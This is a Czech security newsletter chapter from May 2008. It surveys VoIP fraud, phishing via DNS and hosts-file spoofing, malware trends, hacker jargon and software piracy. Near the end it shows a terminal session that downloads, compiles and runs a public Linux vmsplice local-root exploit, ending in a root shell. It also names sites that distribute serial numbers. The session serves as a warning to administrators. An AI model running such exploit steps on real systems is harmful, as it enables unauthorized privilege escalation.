2/2 přehled zajímavostí v oblasti security za poslední období

Komentáře

Transkript

2/2 přehled zajímavostí v oblasti security za poslední období
část 2, díl 2, str. 1
BEZPEČNÁ POČÍTAČOVÁ SÍŤ
díl 2, Přehled zajímavostí v oblasti security za poslední období
2/2
PŘEHLED ZAJÍMAVOSTÍ
V OBLASTI SECURITY
ZA POSLEDNÍ OBDOBÍ
V poslední době se situace z hlediska bezpečnosti dost
podstatným způsobem zhrošila. Hrozby typu virů
a podobných jevů se podle světových statistik spíše
snižují nebo stagnují. O tisíce procent však narůstají
škody, které jsou přímo vyčíslitelné. Jsou hromadně
napadány služby VoIP v Evropě, jsou napadány
ústředny telekomunikačních operátorů i ústředny jejich zákazníků, zdokonalují se metody pishingu.
Hrozby
v posledním
období
Pod pojmem phreaking rozumíme činnost, která vede
k bezplatnému využívání telefonních linek (napichování služby, hovory na účet někoho jiného nebo na
účet telekomunikační firmy). Phreaking má bohatou
čtyřicetiletou historii. Původní telefandové pokládali
phreaking za jistou formu zábavy. Postupně však
phreaking přestal být módou a phreakeři (používají
ukradené telekomunikační informace pro přístup
k dalším počítačům) či phrackeři (snaží se napadat
programy a zneužívat databáze telefonních společkvûten 2008
část 2, díl 2, str. 2
BEZPEČNÁ POČÍTAČOVÁ SÍŤ
díl 2, Přehled zajímavostí v oblasti security za poslední období
ností za účelem získání telefonních služeb zdarma) se
začali učit pronikat do počítačových systémů. Hackeři
(white hats) se od této skupiny distancují.
Skoro všechna zařízení všech výrobců implementujících SIP protokol mají problémy. Škody známé autorovi v ČR za posledního půl roku dosahují desítek milionů korun. VoIP je použitelný, ale musí být velmi
dobře zabezpečen:
• jednotlivá zařízení musejí být umístěna v chráněné
oblasti sítě,
• prioritně je třeba zabezpečit prostředky pro správu
ústředen,
• musejí být pravidelně a často kontrolovány záznamy
o přístupu,
• je vhodné implementovat Fraud detection systém pro
včasné zachycení podvodných volání a nelegálního
provozu,
• je vhodné mít postupy pro řešení následků včetně
shromáždění důkazů a oznámení událostí orgánům
činným v trestním řízení.
Čenářům jsou jistě známy především neutuchající
útoky na elektronické bankovnictví České spořitelny.
Věnujme se této problematice trochu podrobněji.
Co je to
pishing SCAM?
Jedná se o snahu útočníka (autora viru, hackera...) navodit u své oběti dojem, že prostřednictvím internetu
(elektronické pošty nebo webu) komunikuje se svou
bankou nebo platební společností, a získat tak přihlašovací údaje pro přístup k účtu oběti.
Možnosti
kontaktu s obětí
U elektronické pošty jde o systém zcela prozaický.
Oběti je doručen e-mail s falešnou adresou odesílatele. Obsahuje barvy a loga, která jsou typická pro konkrétní banku nebo platební společnost. Dále se zde nachází text vyzývající k vyplnění formuláře v emailu,
kvûten 2008
část 2, díl 2, str. 3
BEZPEČNÁ POČÍTAČOVÁ SÍŤ
díl 2, Přehled zajímavostí v oblasti security za poslední období
kde se nachází takové položky jako číslo účtu oběti
a její PIN. Po vyplnění formuláře a odeslání jsou takto
získaná data odeslána útočníkovi. V e-mailu může být
rovněž doplňující text vyzývající ke zpracování mailu
obětí s tím, že je to nutná součást posilování bezpečnosti banky apod. O rozesílání závadného e-mailu se
zpravidla stará virus.
Kromě komunikace prostřednictvím elektronické
pošty může být oběti rovněž podvržen obsah webu.
Oběť má za to, že se nachází na webové stránce banky,
avšak ve skutečnosti komunikuje s webovými stránkami útočníka. Ten si dopředu zajistil, že se bude adresa webu banky u oběti překládat na IP adresu útočníka.
Pokud se chce majitel účtu přihlásit ke svému účtu prostřednictvím webu, tak zadá do adresního pole webového prohlížeče adresu stránek banky. Tato adresa se
však nepřeloží na IP adresu webu banky, ale útočníka.
K dosažení takového stavu se nabízejí tři možnosti:
1. útok na name server banky,
2. útok na DNS server ISP,
3. úpravy v systému oběti.
Podvržený
obsah webu
Nutno podotknout, že jde o útok z uvedených tří možností nejobtížnější a pokud by byl možný a zejména
pak zůstal bez povšimnutí, jde o selhání základních
principů bezpečnosti. Plánované změny záznamů
name serverů banky by měly mít stanovenou proceduru a jejich stálý monitoring by měl mít vysokou prioritu.
Útok na name
server banky
Takový útok je mnohem cílenější a jeho nebezpečí
spočívá v tom, že během krátké doby obsáhne velké
množství potenciálních obětí. Podstatou útoku je vytvoření nebo změna příslušného záznamu mající vztah
Útok na DNS
server ISP
kvûten 2008
část 2, díl 2, str. 4
BEZPEČNÁ POČÍTAČOVÁ SÍŤ
díl 2, Přehled zajímavostí v oblasti security za poslední období
k adrese banky v DNS forwarderu ISP. Pokud po útoku
bude kdokoliv z klientů ISP používajících tento DNS
forwarder požadovat IP adresu webu banky, tak se mu
vrátí IP adresa útočníka. U rozšířeného systému BIND
se jedná o manuální editaci souboru [/etc/named.conf]
apod. Samotné editaci bude předcházet předchozí zneužití bezpečnostní chyby nebo špatné zabezpečení serveru. Takto podvržený záznam se dle specifikace RFC
1035 nejpozději do 24 hodin automaticky opraví.
Úpravy v systému
oběti
Snad všechny systémy mají ve výchozím nastavení
sítě konvenčně zahrnuto při spuštění procesu překladu
určitého doménového jména na IP adresu vyhledávání
v souboru [hosts]. Pokud se do tohoto souboru umístí
záznam [doménové jméno webu banky & IP adresa
útočníka], tak se s tímto údajem resolver spokojí
a vrátí ho jako platný údaj. Důsledek je zřejmý. U Windows se jedná díky uživatelské přívětivosti Sdílení
souborů a tiskáren v sítích Microsoft a neuváženému
používání systémového účtu administrátora mnohdy
navíc s prázdným heslem o útok jednoduchý. Jakmile
se totiž uživatel takto přihlásí do systému a pohybuje
se v internetu, tak je jeho systém a pevný disk k dispozici.
Oběť navštívila
web účočníka co dál?
Zobrazí se jí webová stránka s formulářem, jež je vyvedena v barvách, které jsou pro banku typické. Na
stránce se může nacházet informace o probíhající
údržbě webové prezentace, takže je nyní možné prostřednictvím webu pouze přihlášení k účtu - přihlašovací formulář je o pár řádků níže. Pokud oběť formulář použije (vyplní uživatelské jméno + PIN a tyto
informace odešle), tak je odešle útočníkovi. Některé
banky vyžadují pro přihlášení uživatele klientský certifikát. V uvedeném formuláři se proto bude nacházet
ještě prvek <input type=“submit“...>.
kvûten 2008
část 2, díl 2, str. 5
BEZPEČNÁ POČÍTAČOVÁ SÍŤ
díl 2, Přehled zajímavostí v oblasti security za poslední období
Především je potřeba si uvědomit, že žádná korektní
banka, platební společnost apod. nebudou nikdy chtít
po svém klientovi zaslání osobních údajů prostřednictvím elektronické pošty. Pokud by k takovému náznaku došlo, tak by měl klient danou společnost obratem kontaktovat a žádat vysvětlení.
Ochrana uživatele
Jakmile se klientovi zobrazí webová stránka obsahující přihlašovací formulář k účtu, tak se musí jednat
o zabezpečený (šifrovaný) přenos dat na základě certifikátu s délkou klíče minimálně 128 bitů (zákon
č. 101/2000 Sb., o ochraně osobních údajů). Dnes již
každý webový prohlížeč umožňuje zobrazení tohoto
certifikátu. Při jeho zobrazení je nutné věnovat pozornost zejména tomu, pro jaké jméno serveru byl vystaven a zda ho vydala důveryhodná certifikační autorita. Dále je k dispozici sériové číslo, pro jehož
ověření porovnáním je možné kontaktovat banku a požadovat jeho sdělení.
Poslední tzv. Fingerprint je docela problém. Neexistuje uživatel, který by si toto číslo pamatoval, a tak se
může stát, že se mu to bude jevit jako „nový“ certifikát bankovního ústavu, on odklepne volbu „akceptovat certifikát“ a problém je na světě.
Ochrana aplikací na virtuálních serverech má mezery
- Options seen lacking in firewall virtual server protection. Podle Gartnerovy zprávy síťové firewally nechrání před průběhem komunikace mezi virtuálními
servery umístěnými na témže HW. Ty spolu totiž komunikují přímo a externě umístěné firewally a IPS jejich komunikaci nemají šanci zachytit.
Situace v oblasti
software
Problémy mělo i Vmware a konkrétně sdílené složky
s hostitelským systémem. Jejich prostřednictvím bylo
možné získat kontrolu nad hostitelským systémem.
kvûten 2008
část 2, díl 2, str. 6
BEZPEČNÁ POČÍTAČOVÁ SÍŤ
díl 2, Přehled zajímavostí v oblasti security za poslední období
Máte připravené bezpečnostní politiky, které lze použít při vývoji aplikací? Security Policies in the Application Development Process - John Steer z Microsoftu
poukazuje na častý nedostatek - zanedbání bezpečnostních aspektů ve fázi vývoje je obvykle důsledkem
nezformulovaných bezpečnostních zásad a jejich
uplatňování. Vývojáři obvykle nemají k dispozici závazné bezpečnostní politiky, které by ve vlastním vývoji mohli uplatňovat. Viz také článek Michaela Cobba
- Enterprise security in 2008: Building trust into the
application development process, který se v dané souvislosti dotýká konkrétnějších problémů.
Poměrně užitečným se zde především v oblasti
WWW aplikací může jevit dokumentace na URL
http://www.owasp.org/, kde najdete řadu dokumentů
k tomu, jak bezpečnost těchto aplikací zajistit a také
jak ji testovat. Protože se jedná skutečně o důležitou
oblast, nabídneme v této a následujících aktualizacích
tohoto díla tuto oblast podrobněji čtenářům, a to prostřednictvím nových autorů Vladimíra Kota a Kamila
Golombeka.
Na otázku, proč jsou webové aplikace často zranitelné,
odpovídá Robert Vamosi v poznatcích získaných z rozhovoru s Chrisem Wysopalem - When Web apps attack. Zranitelnosti (a jejich zneužití) se objevují nejen
například na pornografických stánkách, ale nejčastěji
to bývá na stránkách, které lze charakterizovat jako
amatérské stránky, kde jsou prezentovány různé koníčky (StopBadware, Harvard University).
V podstatě každý počítač obsahuje nezáplatovanou
aplikaci - Nearly every Windows PC likely harbors an
unpatched app, Secunia says. 95 procent počítačů obsahuje jeden či více zranitelných programů, říká Sekvûten 2008
část 2, díl 2, str. 7
BEZPEČNÁ POČÍTAČOVÁ SÍŤ
díl 2, Přehled zajímavostí v oblasti security za poslední období
cunia - na základě testů provedených pomocí utility
Personal Software Inspector. Byla nainstalována
v uplynulém týdnu na 20 000 počítačích.
Charles Babcock v přehledu Open Source Code Contains Security Holes komentuje výsledky analýzy
amerického ministerstva pro národní bezpečnost (Department of Homeland Security). Analýza se týkala
open source a jeho vztahu k zjištěným zranitelnostem
a bezpečnostním chybám.
Recenzi knihy Networking with Microsoft Windows
Vista napsal Adam Robertson. Autorem knihy je Paul
McFedries, kniha má 552 stran a vyšla v prosinci 2007.
Na stránce Networking with Microsoft Windows
Vista: Your Guide to Easy and Secure Windows Vista
Networking najdete její obsah, popř. si ji můžete zakoupit.
Tony Bradley v článku Information protection: Using
Windows Rights Management Services to secure data
uvádí stručný přehled služeb WRMS Windows Rights
Management Services) a řadu doporučení k jejich využití pro ochranu dat.
Používáte Ad-Aware SE Personal (bezplatná verze)?
Pak si přečtěte tuto informaci - Important Update For
Ad-Aware SE Users. Společnost Lavasoft přestala
31. prosince aktualizovat tento SW. Lze ho však odinstalovat a nainstalovat si bezplatný Ad-Aware 2007.
Analýzu stínové ekonomiky malware obsahuje článek
The malware ’shadow economy‘. Ian Williams zachycuje klíčové momenty interview s Maksymem
Schipkou (Message labs). Interview si lze také vyslechnout (odkaz na MP3 soubor je uvnitř článku).
Ekonomika internetového podsvětí se pohybuje v roz-
Malware
kvûten 2008
část 2, díl 2, str. 8
BEZPEČNÁ POČÍTAČOVÁ SÍŤ
díl 2, Přehled zajímavostí v oblasti security za poslední období
sahu cca 105 miliard US dolarů a přesahuje svým objemem drogovou ekonomiku.
Bude červ Nugache nebezpečnější než Storm? Ellen
Messmer v Nugache worm kicking up a Storm upozorňuje, že tento dva roky starý červ byl v posledních
měsících upraven (hackery z RBN - Russian Business
Network), vzorem k tomu byl právě Storm a má nyní
nové nebezpečné vlastnosti.
Top threats and security trends for 2008, přehled obsahuje dva žebříčky: Top ten web exploits for 2007
a Top security threats expected in 2008. Viz také Žebříček virových hrozeb loňska. Kdo vyhrál?. Poznámka: Oba články uvádí jako autora přehledu AVG,
jedná se samozřejmě o společnost Grisoft (u českého
článku, to zůstalo jen v druhé jeho části - zástupci
AVG).
Objevil se nový typ útoku - malware (rootkit) pro
MBR (Master Boot Record) - Excuse me sir: there’s a rootkit in your master boot record, podle popisu
je to skutečně nebezpečný typ malware. Může dokonce přežít reinstalaci systému. Viz podrobnou analýzu na stránce Stealth MBR rootkit. Dále se jím také
zabývá článek Return of the boot-sector virus a nověji
také New rootkit hides in hard drive’s boot record.
Cloaking malware holes up where Windows can’t find
it, say researchers.
Hackeři
kvûten 2008
Jak se bránit novým trikům počítačových útočníků Jakub Dvořák na Technetu: „Víte, jaká bezpečnostní
rizika na vás a váš počítač číhají v tomto roce? Přibudou hrozby pocházející z webových aplikací, na vzestupu budou i ty dosud méně známé či se objeví zcela nové. A majitele Windows Vista čeká zkouška
ohněm.“
část 2, díl 2, str. 9
BEZPEČNÁ POČÍTAČOVÁ SÍŤ
díl 2, Přehled zajímavostí v oblasti security za poslední období
Sally Whittle v Anatomy of a hack attack s pomocí
bezpečnostních expertů vytváří podobu typického
hackerského útoku na dvě velké organizace. Krok po
kroku pak rozebírá, jak by v takovém případě měl postupovat šéf IT.
Útok SQL injection byl příčinou hromadného hacku
desetitisíců webů - Mass hack infects tens of thousands of sites. Then they serve visitors multiple exploits, including October RealPlayer attack. I když je
řada z těchto webů již očištěna, přesto se příslušný
škodlivý skript stále dá najít na velkém počtu webových serverů.
Webová stránka Geeks.com měla certifikát pro bezpečný web, ale přesto byla hacknuta - Update: ’Hacker safe‘ Web site gets hit by hacker. Vedlo to následně
ke kompromitaci citlivých dat zákazníků (jména, adresy, telefonní čísla a čísla kreditních karet Visa).
Pro získání celkového přehledu osob pohybujících se
v digitálním undergroundu jsou uvedeny další pojmy:
samuraj - útočník, který pronikne do systému, avšak
následně správci oznámí bezpečnostní nedostatky
a poskytne mu konkrétní rady,
script-kiddies - začínající útočníci s průměrnými znalostmi, kteří dokáží na internetu najít kód a mírně ho
upravit, např. pro spuštění nové varianty viru (převážně využívají nástroje vytvořené jinými útočníky skripty),
packet monkeys - nezkušení uživatelé, kteří provádějí DoS útoky či jiné útoky nevyžadující prolomení
ochrany, opět za použití utilit vytvořených jinými,
phreaker/phracker - útočník, který proniká a zneužívá telefonních sítí,
kvûten 2008
část 2, díl 2, str. 10
BEZPEČNÁ POČÍTAČOVÁ SÍŤ
díl 2, Přehled zajímavostí v oblasti security za poslední období
phisher - útočník, který vytváří identické webové
stránky většinou různých finančních institucí a poté
ukradne a zneužije citlivé údaje uživatelů, kteří je zadají v domnění, že jde o oficiální stránky instituce,
knacker - útočník, který odstraňuje ochranný kód programu za účelem jeho volného používání,
looser/lamer - uživatelé neznalí prostředí IT.
Softwarové pirátství je pravděpodobně nejproblematičtější oblastí neoprávněných zásahů do autorského díla. Každý uživatel počítače si shání SW dle
svého zájmu, účelu a pochopitelně též finančních možností. Počítačovým programem nemáme na mysli jen
různé kancelářské aplikace, rozmanité utility pro práci
s grafikou, ale také hry, které jsou častou obětí softwarového pirátství u dětí a mládeže. Dalším oblíbeným artiklem, který se ocitá ve spárech pirátství, jsou
hudební (nejčastěji v komprimovaném formátu MP3)
a filmová díla (formát AVI, DivX apod.).
S pirátstvím je neodmyslitelně spjata problematika výroby a užívání tzv. cracků (§ 43 TrZ). Tímto pojmem
rozumíme program, který umožňuje plně funkční užívání časově omezeného nebo jinak chráněné aplikačního programu nebo hry. Kromě cracků je na internetu
také zveřejňováno velké množství sériových čísel (např.
www.serials.com, www.serials.ws, www.t1000.net aj.)
k nezměrnému počtu programů, po jejichž zadání se
program stává plně funkčním. Dalším typem překonávání důkladnější ochrany, a to tzv. hardwarového
klíče, který je implementován u dražších programů,
jako např. AutoCAD, je tzv. reverse ingeneering
(zpětná dekompilace systému). Následně stačí přeskočit komunikaci s HW klíčem nebo test daného
omezení. V řadě případů je to pro takové osoby výzvou a někdy stačí zadat požadavek na prolomení dané
kvûten 2008
část 2, díl 2, str. 11
BEZPEČNÁ POČÍTAČOVÁ SÍŤ
díl 2, Přehled zajímavostí v oblasti security za poslední období
aplikace a během pár dnů dostanete výsledek. Ovšem
pochopitelně nevíte, co ještě jste případně k výsledku
získali.
Fenomén warezu je výsledkem nástupu moderních
ICT, a to především internetu. Zatímco do nástupu warezu šlo o izolované obory pirátství v oblasti SW,
hudby a videa, díky rychlé přenosové kapacitě internetu a stále se zdokonalujícím kompresním formátům
dat spolu se zařízením pro jejich uchovávání se dnes
spojují všechny tyto tři činnosti do jedné.
Princip warez scény je postaven na bázi „non-profit“.
Drtivá většina lidí toto pravidlo respektuje a chová se
podle něj. Jediné, co jednotlivec nebo skupina získají,
je respekt konkurenčních skupin v případě kvalitních výsledků.
Warez bývá doménou skupin, které se vyznačují poměrně vysokou mírou specializace a dělby práce.
V každé takové skupině většinou bývá jeden či několik crackerů, kteří se zabývají obcházením ochrany
proti kopírování zabudované v programech. Další se
věnují propagaci, tvorbě webových stránek s upoutávkami na své „produkty“, tvorbou katalogů, které
jsou rozesílány, reklamních letáků atp.
Nejpopulárnější formou pro sdílení nelegálního obsahu jsou tzv. peer-to-peer sítě - P2P (opak architektury klient-server). Oblíbenost výměnných sítí spočívá v tom, že s rostoucím množstvím uživatelů
celková dostupná přenosová kapacita roste, zatímco
u modelu client-server, kdy se uživatelé musí dělit
o konstantní kapacitu serveru, průměrná přenosová
rychlost při nárůstu uživatelů klesá. Tyto programy pro
sdílení souborů, jako např. Direct Connect (DC,
DC++), BitTorrent, WarezP2P, eMule apod., umožkvûten 2008
část 2, díl 2, str. 12
BEZPEČNÁ POČÍTAČOVÁ SÍŤ
díl 2, Přehled zajímavostí v oblasti security za poslední období
ňují vyhledávání podle jména, žánru či klíčového slova
týkající se hudby, filmů či SW. Odhaduje se, že na internetu se nachází téměř miliarda nelegálně nasdílených hudebních skladeb.
Dnešní anonymní výměnné sítě umožňují (legální i nelegální) výměnu souborů s prakticky nulovou mírou
odpovědnosti jednotlivých uživatelů. Dochází však
k žalobám (zejména v USA) na provozovatele takových sítí, které podávají zástupci autorů a organizace,
jako je RIAA či MPAA. Poslední známou událostí je
zastavení serveru thepiratebay.org.
Bezpečnost jádra
Linuxu
V posledním období se objevují bezpečnostní problémy nejen v MS Windows, ale i v Linuxu. Docela
zajímavý je následující exploit, který umožňuje získat
v systému pro běžného uživatele práva superuživatele.
[email protected]:~$ uname -a
Linux toad 2.6.18-5-486 #1 Mon Dec 24
16:04:42 UTC 2007 i586 GNU/Linux
[email protected]:~$ id
uid=500(ber) gid=100(users)
skupiny=100(users),502(vboxusers)
[email protected]:~$ whoami
ber
[email protected]:~$ wget -nv http://www.securityfocus.com/data/vulnerabilities/explo
its/27704.c
13:13:30 URL:http://downloads.securityfocus.com/vulnerabilities/ex
ploits/27704.c [6264/6264] -> „27704.c“
[1]
[email protected]:~$ gcc 27704.c -o 27704
[email protected]:~$ ./27704
---------------------------------Linux vmsplice Local Root Exploit
By qaaz
----------------------------------
kvûten 2008
část 2, díl 2, str. 13
BEZPEČNÁ POČÍTAČOVÁ SÍŤ
díl 2, Přehled zajímavostí v oblasti security za poslední období
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7da9000 .. 0xb7ddb000
[+] root
[email protected]:~# id
uid=0(root) gid=0(root)
skupiny=0(root),1(bin),2(daemon),3(sys),4(
adm),6(disk),10(wheel)
[email protected]:~# whoami
root
[email protected]:~#
Takže pokud spravujete někde Linux systémy, je třeba
dávat pozor na takovéto problémy. Není dobré spojovat služby a např. na jednom systému provozovat
systém pro práci uživatelů s přístupem přes SSH
a např. e-mailový systém organizace. Problém v tomto
případě může být ten, že se uživatel dostane k e-mailovým schránkám ostatních uživatelů. To nemusí být
žádoucí a asi to není ani očekávaný stav.
kvûten 2008
část 2, díl 2, str. 14
díl 2, Přehled zajímavostí v oblasti security za poslední období
kvûten 2008
BEZPEČNÁ POČÍTAČOVÁ SÍŤ

Podobné dokumenty